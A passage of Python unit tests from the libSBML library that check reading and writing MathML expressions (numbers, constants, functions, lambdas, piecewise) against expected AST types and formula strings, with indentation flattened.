self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_cn_default(self):
s = wrapMathML("<cn> 12345.7 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL )
self.assert_( self.N.getReal() == 12345.7 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_cn_e_notation(self):
s = wrapMathML("<cn type='e-notation'> 12.3 <sep/> 5 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL_E )
self.assert_( self.N.getMantissa() == 12.3 )
self.assert_( self.N.getExponent() == 5 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_cn_integer(self):
s = wrapMathML("<cn type='integer'> 12345 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_INTEGER )
self.assert_( self.N.getInteger() == 12345 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_cn_rational(self):
s = wrapMathML("<cn type='rational'> 12342 <sep/> 2342342 </cn>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_RATIONAL )
self.assert_( self.N.getNumerator() == 12342 )
self.assert_( self.N.getDenominator() == 2342342 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_cn_real(self):
s = wrapMathML("<cn type='real'> 12345.7 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL )
self.assert_( self.N.getReal() == 12345.7 )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_cn_units(self):
s = wrapMathMLUnits("<cn sbml:units=\"mole\"> 12345.7 </cn>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL )
self.assert_( self.N.getReal() == 12345.7 )
self.assert_( self.N.getUnits() == "mole" )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_constants_exponentiale(self):
s = wrapMathML("<exponentiale/>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_CONSTANT_E )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_constants_false(self):
s = wrapMathML("<false/>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_CONSTANT_FALSE )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_constants_infinity(self):
s = wrapMathML("<infinity/>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL )
self.assert_( util_isInf(self.N.getReal()) == True )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_constants_notanumber(self):
s = wrapMathML("<notanumber/>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_REAL )
self.assertEqual( True, isnan(self.N.getReal()) )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_constants_pi(self):
s = wrapMathML("<pi/>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_CONSTANT_PI )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_constants_true(self):
s = wrapMathML("<true/>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_CONSTANT_TRUE )
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_cos(self):
s = wrapMathML("<apply><cos/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "cos(x)" == self.F ))
pass
def test_element_cosh(self):
s = wrapMathML("<apply><cosh/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "cosh(x)" == self.F ))
pass
def test_element_cot(self):
s = wrapMathML("<apply><cot/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "cot(x)" == self.F ))
pass
def test_element_coth(self):
s = wrapMathML("<apply><coth/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "coth(x)" == self.F ))
pass
def test_element_csc(self):
s = wrapMathML("<apply><csc/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "csc(x)" == self.F ))
pass
def test_element_csch(self):
s = wrapMathML("<apply><csch/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "csch(x)" == self.F ))
pass
def test_element_csymbol_avogadro(self):
s = wrapMathML("<csymbol encoding='text' " + "definitionURL='http://www.sbml.org/sbml/symbols/avogadro'> NA </csymbol>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_NAME_AVOGADRO )
self.assert_(( "NA" == self.N.getName() ))
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_csymbol_delay_1(self):
s = wrapMathML("<csymbol encoding='text' " + "definitionURL='http://www.sbml.org/sbml/symbols/delay'> delay </csymbol>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_FUNCTION_DELAY )
self.assert_(( "delay" == self.N.getName() ))
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_csymbol_delay_2(self):
s = wrapMathML("<apply>" +
" <csymbol encoding='text' definitionURL='http://www.sbml.org/sbml/" +
"symbols/delay'> my_delay </csymbol>" +
" <ci> x </ci>" +
" <cn> 0.1 </cn>" +
"</apply>\n")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "my_delay(x, 0.1)" == self.F ))
pass
def test_element_csymbol_delay_3(self):
s = wrapMathML("<apply>" +
" <power/>" +
" <apply>" +
" <csymbol encoding='text' definitionURL='http://www.sbml.org/sbml/" +
"symbols/delay'> delay </csymbol>" +
" <ci> P </ci>" +
" <ci> delta_t </ci>" +
" </apply>\n" +
" <ci> q </ci>" +
"</apply>\n")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "pow(delay(P, delta_t), q)" == self.F ))
pass
def test_element_csymbol_time(self):
s = wrapMathML("<csymbol encoding='text' " + "definitionURL='http://www.sbml.org/sbml/symbols/time'> t </csymbol>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_NAME_TIME )
self.assert_(( "t" == self.N.getName() ))
self.assert_( self.N.getNumChildren() == 0 )
pass
def test_element_eq(self):
s = wrapMathML("<apply> <eq/> <ci>a</ci> <ci>b</ci> <ci>c</ci> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "eq(a, b, c)" == self.F ))
pass
def test_element_exp(self):
s = wrapMathML("<apply><exp/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "exp(x)" == self.F ))
pass
def test_element_factorial(self):
s = wrapMathML("<apply><factorial/><cn> 5 </cn></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "factorial(5)" == self.F ))
pass
def test_element_floor(self):
s = wrapMathML("<apply><floor/><cn> 1.2 </cn></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "floor(1.2)" == self.F ))
pass
def test_element_function_call_1(self):
s = wrapMathML("<apply> <ci> foo </ci> <ci> x </ci> </apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "foo(x)" == self.F ))
pass
def test_element_function_call_2(self):
s = wrapMathML("<apply> <plus/> <cn> 1 </cn>" +
" <apply> <ci> f </ci> <ci> x </ci> </apply>" +
"</apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "1 + f(x)" == self.F ))
pass
def test_element_geq(self):
s = wrapMathML("<apply> <geq/> <cn>1</cn> <ci>x</ci> <cn>0</cn> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "geq(1, x, 0)" == self.F ))
pass
def test_element_gt(self):
s = wrapMathML("<apply> <gt/> <infinity/>" +
" <apply> <minus/> <infinity/> <cn>1</cn> </apply>" +
"</apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "gt(INF, INF - 1)" == self.F ))
pass
def test_element_invalid_mathml(self):
invalid = wrapMathML("<lambda definitionURL=\"http://biomodels.net/SBO/#SBO:0000065\">" +
"<bvar>" +
"<ci>c</ci>" +
"</bvar>" +
"<apply>" +
" <ci>c</ci>" +
"</apply>" +
"</lambda>\n")
self.N = libsbml.readMathMLFromString(None)
self.assert_( self.N == None )
self.N = libsbml.readMathMLFromString(invalid)
self.assert_( self.N == None )
pass
def test_element_lambda(self):
s = wrapMathML("<lambda>" +
" <bvar> <ci>x</ci> </bvar>" +
" <apply> <sin/>" +
" <apply> <plus/> <ci>x</ci> <cn>1</cn> </apply>" +
" </apply>" +
"</lambda>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "lambda(x, sin(x + 1))" == self.F ))
pass
def test_element_leq(self):
s = wrapMathML("<apply> <leq/> <cn>0</cn> <ci>x</ci> <cn>1</cn> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "leq(0, x, 1)" == self.F ))
pass
def test_element_ln(self):
s = wrapMathML("<apply><ln/><ci> a </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "log(a)" == self.F ))
pass
def test_element_log_1(self):
s = wrapMathML("<apply> <log/> <logbase> <cn type='integer'> 3 </cn> </logbase>" +
" <ci> x </ci>" +
"</apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "log(3, x)" == self.F ))
pass
def test_element_log_2(self):
s = wrapMathML("<apply> <log/> <ci> x </ci> </apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "log10(x)" == self.F ))
pass
def test_element_lt(self):
s = wrapMathML("<apply> <lt/> <apply> <minus/> <infinity/> <infinity/> </apply>" +
" <cn>1</cn>" +
"</apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "lt(INF - INF, 1)" == self.F ))
pass
def test_element_math(self):
s = wrapXML("<math xmlns='http://www.w3.org/1998/Math/MathML'/>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.assert_( self.N.getType() == libsbml.AST_UNKNOWN )
pass
def test_element_neq(self):
s = wrapMathML("<apply> <neq/> <notanumber/> <notanumber/> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "neq(NaN, NaN)" == self.F ))
pass
def test_element_not(self):
s = wrapMathML("<apply> <not/> <ci> TooShabby </ci> </apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "not(TooShabby)" == self.F ))
pass
def test_element_operator_plus(self):
s = wrapMathML("<apply> <plus/> <cn> 1 </cn> <cn> 2 </cn> <cn> 3 </cn> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "1 + 2 + 3" == self.F ))
pass
def test_element_operator_times(self):
s = wrapMathML("<apply> <times/> <ci> x </ci> <ci> y </ci> <ci> z </ci> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "x * y * z" == self.F ))
pass
def test_element_or(self):
s = wrapMathML("<apply> <or/> <ci>a</ci> <ci>b</ci> <ci>c</ci> <ci>d</ci> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "or(a, b, c, d)" == self.F ))
pass
def test_element_piecewise(self):
s = wrapMathML("<piecewise>" +
" <piece>" +
" <apply> <minus/> <ci>x</ci> </apply>" +
" <apply> <lt/> <ci>x</ci> <cn>0</cn> </apply>" +
" </piece>" +
" <piece>" +
" <cn>0</cn>" +
" <apply> <eq/> <ci>x</ci> <cn>0</cn> </apply>" +
" </piece>" +
" <piece>" +
" <ci>x</ci>" +
" <apply> <gt/> <ci>x</ci> <cn>0</cn> </apply>" +
" </piece>" +
"</piecewise>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "piecewise(-x, lt(x, 0), 0, eq(x, 0), x, gt(x, 0))" == self.F ))
pass
def test_element_piecewise_otherwise(self):
s = wrapMathML("<piecewise>" +
" <piece>" +
" <cn>0</cn>" +
" <apply> <lt/> <ci>x</ci> <cn>0</cn> </apply>" +
" </piece>" +
" <otherwise>" +
" <ci>x</ci>" +
" </otherwise>" +
"</piecewise>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "piecewise(0, lt(x, 0), x)" == self.F ))
pass
def test_element_power(self):
s = wrapMathML("<apply><power/> <ci>x</ci> <cn>3</cn> </apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "pow(x, 3)" == self.F ))
pass
def test_element_root_1(self):
s = wrapMathML("<apply> <root/> <degree> <cn type='integer'> 3 </cn> </degree>" +
" <ci> a </ci>" +
"</apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "root(3, a)" == self.F ))
pass
def test_element_root_2(self):
s = wrapMathML("<apply> <root/> <ci> a </ci> </apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "sqrt(a)" == self.F ))
pass
def test_element_sec(self):
s = wrapMathML("<apply><sec/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "sec(x)" == self.F ))
pass
def test_element_sech(self):
s = wrapMathML("<apply><sech/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "sech(x)" == self.F ))
pass
def test_element_sin(self):
s = wrapMathML("<apply><sin/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "sin(x)" == self.F ))
pass
def test_element_sinh(self):
s = wrapMathML("<apply><sinh/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "sinh(x)" == self.F ))
pass
def test_element_tan(self):
s = wrapMathML("<apply><tan/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "tan(x)" == self.F ))
pass
def test_element_tanh(self):
s = wrapMathML("<apply><tanh/><ci> x </ci></apply>")
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "tanh(x)" == self.F ))
pass
def test_element_xor(self):
s = wrapMathML("<apply> <xor/> <ci>a</ci> <ci>b</ci> <ci>b</ci> <ci>a</ci> </apply>"
)
self.N = libsbml.readMathMLFromString(s)
self.assert_( self.N != None )
self.F = libsbml.formulaToString(self.N)
self.assert_(( "xor(a, b, b, a)" == self.F ))
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestReadMathML))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/math/TestWriteMathML.py
```python
import sys
import unittest
import libsbml
def util_NaN():
z = 1e300
z = z * z
return z - z
def util_PosInf():
z = 1e300
z = z * z
return z
def util_NegInf():
z = 1e300
z = z * z
return -z
def wrapString(s):
return s
pass
def MATHML_FOOTER():
return "</math>"
pass
def MATHML_HEADER():
return "<math xmlns=\"http://www.w3.org/1998/Math/MathML\">\n"
pass
def MATHML_HEADER_UNITS():
return "<math xmlns=\"http://www.w3.org/1998/Math/MathML\""
pass
def MATHML_HEADER_UNITS2():
return " xmlns:sbml=\"http://www.sbml.org/sbml/level3/version1/core\">\n"
pass
def XML_HEADER():
return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
pass
def wrapMathML(s):
r = XML_HEADER()
r += MATHML_HEADER()
r += s
r += MATHML_FOOTER()
return r
pass
def wrapMathMLUnits(s):
r = XML_HEADER()
r += MATHML_HEADER_UNITS()
r += MATHML_HEADER_UNITS2()
r += s
r += MATHML_FOOTER()
return r
pass
class TestWriteMathML(unittest.TestCase):
global S
S = None
global N
N = None
def equals(self, *x):
if len(x) == 2:
return x[0] == x[1]
elif len(x) == 1:
return x[0] == self.OSS.str()
def setUp(self):
self.N = None
self.S = None
pass
def tearDown(self):
self.N = None
self.S = None
pass
def test_MathMLFormatter_ci(self):
expected = wrapMathML(" <ci> foo </ci>\n")
self.N = libsbml.parseFormula("foo")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_e_notation_1(self):
expected = wrapMathML(" <cn type=\"e-notation\"> 0 <sep/> 3 </cn>\n"
)
self.N = libsbml.parseFormula("0e3")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_e_notation_2(self):
expected = wrapMathML(" <cn type=\"e-notation\"> 2 <sep/> 3 </cn>\n"
)
self.N = libsbml.parseFormula("2e3")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_e_notation_3(self):
expected = wrapMathML(" <cn type=\"e-notation\"> 1234567.8 <sep/> 3 </cn>\n"
)
self.N = libsbml.parseFormula("1234567.8e3")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_e_notation_4(self):
expected = wrapMathML(" <cn type=\"e-notation\"> 6.0221367 <sep/> 23 </cn>\n"
)
self.N = libsbml.parseFormula("6.0221367e+23")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_e_notation_5(self):
expected = wrapMathML(" <cn type=\"e-notation\"> 4 <sep/> -6 </cn>\n"
)
self.N = libsbml.parseFormula(".000004")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_e_notation_6(self):
expected = wrapMathML(" <cn type=\"e-notation\"> 4 <sep/> -12 </cn>\n"
)
self.N = libsbml.parseFormula(".000004e-6")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_e_notation_7(self):
expected = wrapMathML(" <cn type=\"e-notation\"> -1 <sep/> -6 </cn>\n"
)
self.N = libsbml.parseFormula("-1e-6")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_integer(self):
expected = wrapMathML(" <cn type=\"integer\"> 5 </cn>\n")
self.N = libsbml.parseFormula("5")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_rational(self):
expected = wrapMathML(" <cn type=\"rational\"> 1 <sep/> 3 </cn>\n"
)
self.N = libsbml.ASTNode()
self.N.setValue(1,3)
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_real_1(self):
expected = wrapMathML(" <cn> 1.2 </cn>\n")
self.N = libsbml.parseFormula("1.2")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_real_2(self):
expected = wrapMathML(" <cn> 1234567.8 </cn>\n")
self.N = libsbml.parseFormula("1234567.8")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_real_3(self):
expected = wrapMathML(" <cn> -3.14 </cn>\n")
self.N = libsbml.parseFormula("-3.14")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_real_locale(self):
expected = wrapMathML(" <cn> 2.72 </cn>\n")
self.N = libsbml.parseFormula("2.72")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_cn_units(self):
expected = wrapMathMLUnits(" <cn sbml:units=\"mole\"> 1.2 </cn>\n")
self.N = libsbml.parseFormula("1.2")
self.N.setUnits("mole")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_constant_exponentiale(self):
expected = wrapMathML(" <exponentiale/>\n")
self.N = libsbml.ASTNode(libsbml.AST_CONSTANT_E)
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_constant_false(self):
expected = wrapMathML(" <false/>\n")
self.N = libsbml.ASTNode(libsbml.AST_CONSTANT_FALSE)
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_constant_infinity(self):
expected = wrapMathML(" <infinity/>\n")
self.N = libsbml.ASTNode()
self.N.setValue( util_PosInf() )
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_constant_infinity_neg(self):
expected = wrapMathML(" <apply> <minus/> <infinity/> </apply>\n"
)
self.N = libsbml.ASTNode()
self.N.setValue(- util_PosInf())
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_constant_notanumber(self):
expected = wrapMathML(" <notanumber/>\n")
self.N = libsbml.ASTNode(libsbml.AST_REAL)
self.N.setValue( util_NaN() )
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_constant_true(self):
expected = wrapMathML(" <true/>\n")
self.N = libsbml.ASTNode(libsbml.AST_CONSTANT_TRUE)
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_csymbol_avogadro(self):
expected = wrapMathML(" <csymbol encoding=\"text\" " + "definitionURL=\"http://www.sbml.org/sbml/symbols/avogadro\"> NA </csymbol>\n")
self.N = libsbml.ASTNode(libsbml.AST_NAME_AVOGADRO)
self.N.setName("NA")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_csymbol_delay(self):
expected = wrapMathML(" <apply>\n" +
" <csymbol encoding=\"text\" definitionURL=\"http://www.sbml.org/sbml/" +
"symbols/delay\"> my_delay </csymbol>\n" +
" <ci> x </ci>\n" +
" <cn> 0.1 </cn>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("delay(x, 0.1)")
self.N.setName("my_delay")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_csymbol_time(self):
expected = wrapMathML(" <csymbol encoding=\"text\" " + "definitionURL=\"http://www.sbml.org/sbml/symbols/time\"> t </csymbol>\n")
self.N = libsbml.ASTNode(libsbml.AST_NAME_TIME)
self.N.setName("t")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_function_1(self):
expected = wrapMathML(" <apply>\n" +
" <ci> foo </ci>\n" +
" <cn type=\"integer\"> 1 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" <cn type=\"integer\"> 3 </cn>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("foo(1, 2, 3)")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_function_2(self):
expected = wrapMathML(" <apply>\n" +
" <ci> foo </ci>\n" +
" <cn type=\"integer\"> 1 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" <apply>\n" +
" <ci> bar </ci>\n" +
" <ci> z </ci>\n" +
" </apply>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("foo(1, 2, bar(z))")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_lambda(self):
expected = wrapMathML(" <lambda>\n" +
" <bvar>\n" +
" <ci> x </ci>\n" +
" </bvar>\n" +
" <bvar>\n" +
" <ci> y </ci>\n" +
" </bvar>\n" +
" <apply>\n" +
" <root/>\n" +
" <degree>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" </degree>\n" +
" <apply>\n" +
" <plus/>\n" +
" <apply>\n" +
" <power/>\n" +
" <ci> x </ci>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" </apply>\n" +
" <apply>\n" +
" <power/>\n" +
" <ci> y </ci>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" </apply>\n" +
" </apply>\n" +
" </apply>\n" +
" </lambda>\n")
self.N = libsbml.parseFormula("lambda(x, y, root(2, x^2 + y^2))")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_lambda_no_bvars(self):
expected = wrapMathML(" <lambda>\n" +
" <apply>\n" +
" <plus/>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" </apply>\n" +
" </lambda>\n")
self.N = libsbml.parseFormula("lambda(2 + 2)")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_log(self):
expected = wrapMathML(" <apply>\n" +
" <log/>\n" +
" <logbase>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" </logbase>\n" +
" <ci> N </ci>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("log(2, N)")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_minus(self):
expected = wrapMathML(" <apply>\n" +
" <minus/>\n" +
" <cn type=\"integer\"> 1 </cn>\n" +
" <cn type=\"integer\"> 2 </cn>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("1 - 2")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_minus_unary_1(self):
expected = wrapMathML(" <cn type=\"integer\"> -2 </cn>\n"
)
self.N = libsbml.parseFormula("-2")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_minus_unary_2(self):
expected = wrapMathML(" <apply>\n" +
" <minus/>\n" +
" <ci> a </ci>\n" +
" </apply>\n")
self.N = libsbml.parseFormula("-a")
self.S = libsbml.writeMathMLToString(self.N)
self.assertEqual( True, self.equals(expected,self.S) )
pass
def test_MathMLFormatter_piecewise(self):
expected = wrapMathML(" <piecewise>\n" +
" <piece>\n" +
" <apply>\n" +
" <minus/>\n" +
" <ci> x </ci>\n" +
" </apply>\n" +
" <apply>\n" +
" <lt/>\n" +
" <ci> x </ci>\n" +
" <cn type=\"integer\"> 0 </cn>\n" +
" </apply>\n" +
" </piece>\n" +
" <piece>\n" +
" <cn type=\"integer\"> 0 </cn>\n" +
" <apply>\n" +
" <eq/>\n" +
" <ci> x </ci>\n" +
" <cn type=\"integer\"> 0 </cn>\n" +
" </apply>\n" +
" </piece>\n" +
" <piece>\n" +
" <ci> x </ci>\n" +
" <apply>\n" +
" <gt/>\n" +
" <ci> x </ci>\n" +
" <cn type=\"integer\"> 0 </cn>\n" +
" </apply>\n" +
" </piece>\n" +
" </piecewise>\n")
f = "piecewise(-x, lt(x, 0), 0, eq(x, 0), x, gt(x, 0))";
self.N = libsbml.parseFormula(f)
